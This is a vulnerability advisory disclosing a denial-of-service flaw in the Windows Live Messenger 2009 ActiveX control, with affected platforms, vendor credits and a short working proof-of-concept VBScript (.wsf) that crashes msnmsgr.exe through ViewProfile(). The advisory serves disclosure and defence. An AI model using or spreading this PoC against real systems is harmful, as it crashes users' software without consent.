Product:
Windows Live Messenger 2009 (Build 14.0.8089.726)
************************************************************************
********
Vulnerability:
ActiveX - Denial of Service
************************************************************************
********
Discussion:
Vulnerability is in Activex Control(msgsc.14.0.8089.726.dll)
Sending a string to ViewProfile() , cause a crash on msnmsgr.exe
*must be signed in Msn Messenger account for triggerin the vulnerability.
************************************************************************
********
Vulnerable:
Windows Live Messenger 2009 on Windows Vista
Windows Live Messenger 2009 on Windows 7
Not Vulnerable:
Windows Live Messenger 2009 on Windows XP
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - sterreich - Schweiz
www.hackattack.com
and
Natal Networks Inc.
Vulnerability Discovery, Penetration Testing, IT Security Consulting
www.natalnetworks.com
************************************************************************
********
Original Advisory
www.hackattack.com
www.natalnetworks.com
************************************************************************
********
PoC .wsf script:
'works on vista and windows7
<package>
<job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' />
<script language='vbscript'>
arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
target.ViewProfile arg1
</script>
</job>
</package>
About HACKATTACK and Natal Networks
================
HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria
More Information about HACKATTACK at
http://www.hackattack.com
Natal Networks was founded by Hellcode Research Team in 2009.
Main mission of Natal Network is discover and research vulnerabilities.
Providing penetration tests and security auditing services.
More about; www.natalnetworks.com